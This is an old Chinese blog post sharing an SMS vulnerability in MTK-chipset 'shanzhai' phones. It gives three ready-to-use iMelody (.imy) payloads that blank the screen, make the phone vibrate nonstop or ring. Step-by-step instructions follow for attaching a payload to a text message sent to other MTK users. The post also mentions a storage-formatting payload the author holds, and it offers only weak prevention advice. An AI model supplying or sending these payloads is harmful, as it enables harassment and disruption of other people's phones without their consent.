注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

轻松度过每一天

真的猛士敢于直面惨淡的人生,敢于正视淋漓的鲜血,这是怎样的哀痛者和幸福者!!

 
 
 

日志

 
 
关于我

When you are young, you may want several love experiences. But as timegoes on, you will realize that if you really love someone, the wholelife will not be enough. You need time to know, to forgive and to love.All this needs a very big mind.

网易考拉推荐

MTK手机短信漏洞大曝光(含代码及使用方法)  

2009-05-28 10:31:20|  分类: 手机、玩机 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

最近很热闹的事情就是MTK手机短信漏洞的曝光,由于购买使用MTK方案的手机现在在市场上占有不小的比重,而且此漏洞几乎对所有MTK手机都有效,个人用户基本不能防止或者补救,所以受影响的范围非常广。经过多方搜集整理,还有本人的测试,果然发现此漏洞真的屡试不爽,特此分享下。

  也许很多人在听到“MTK方案手机”时不知所云,其实这是正规的叫法。MTK方案手机指的是采用联发科公司研制的MTK手机芯片的手机,由于价格低功能强,市场占有率很高,同时由于生产成本低廉,很多不知名品牌都可以手机制造的行业,因此使市场造成不小的混乱。一般我们都称之为“山寨手机”,具体的一个显著特征是屏幕是触摸屏,而且屏幕下方有一条灰色功能区,上面分布有四五个功能按键,具体见图:

 看了图基本上我们就清楚什么是所谓的“MTK手机”了,既然明确了目标,那么下面就开始讲讲这个漏洞。

一、被攻击时的状况:

  最近经常有人反映自己的在接到一条恶作剧短信后,手机出现黑屏、振动不止、响铃等状况,这就是最典型的漏洞特征。这类短信基本上都是先告诉你往下翻阅短信会出现黑屏等状况,有勇气的就翻吧。一般人都会以为是无聊人的无聊游戏,谁知道当往下翻真会出现所说的状况……

二、漏洞代码:

  其实出现上面这些情况都是由于MTK手机支持的一种imy格式铃声引起的,在短信内容中加载不同的imy文件会造成不同的效果。这种imy文件的内容具体如下:(注意,代码为两行#之间的部分,不包括#)

1。黑屏

###########################

BEGIN:IMELODY

BEAT:1200

MELODY: (ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)

END:IMELODY

###########################

2。猛震

###########################

BEGIN:IMELODY

VERSION:1.2

FORMAT:CLASS1.0

BEAT:100

MELODY: (ledoffledonbackoffbackonvibeon@300)

END:IMELODY

###########################

3。振铃

###########################

BEGIN:IMELODY

VERSION:1.2

FORMAT:CLASS1.0

BEAT:200

MELODY: (ledoffbackoffvibeonr5vibeoffledonbackonr5@200)

END:IMELODY

###########################

三、漏洞使用方法

  这种短信漏洞的使用只能用于MTK手机上,也就是说必须是MTK手机编辑发送类似短信给其他的MTK手机,才能生效。所以首先,你必须有一部MTK手机才行。然后在电脑中打开记事本,把上面的相应的代码(两行#号之间的部分,不包含#号)粘贴进去,并存成后缀名为imy的文件,并且把imy文件放在手机的Audio文件夹内,一定注意是手机的文件夹,而非储存卡的。最后,开始在手机上编写短信(注意是短信,而非彩信),短信内容随意,编辑之后点“选项”——“插入对象”——“我的铃声”——选取刚才做好的imy文件,发送给同样是MTK手机的用户即可。

  编写imy文件时请注意,在“MELODY”那一行中有一个@符号,后面是一个数字,其实这个数字是作用时间。@后面的数字越大时间也就越长,自己看情况更改即可。时间单位是毫秒。

四、漏洞分析

  看了前面的内容,也就清楚其实这个漏洞的精髓就是imy文件。据了解,imy文件是索爱最早支持的一种代码形式的单音节铃声,可以用代码调用手机的解码芯片发出一些声音甚至一些核心指令。所以代码里面如果是诸如黑屏、响铃等类似的命令,发送给对方后,一旦打开也就触发了这些命令,当然会造成相应的结果。目前看来,只要有人能够懂得这些代码的编写语言,发送格式化储存卡一类的短信应该是没有问题的。我手里就有一个格式化命令的imy文件,由于担心给他人造成不良后果,一直没有实验。

五、实验情况及预防

  在我的实验过程中,我发现并非所有屏幕有灰色功能键的手机都能中招,也许这些手机使用的不是MTK方案吧。我推测,既然imy并非MTK手机专有格式,那么理论上所有支持imy铃声的手机都会中招。至于预防,我想这是很难的,毕竟只要触发就会中招,也许只能是看到类似的短信立即关闭,不继续翻阅从而避免激活imy文件代码,可能会有一些帮助。当然,这只是相对的,如果对方发送的短信是先插入的imy文件再写文字的话……

  评论这张
 
阅读(202)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018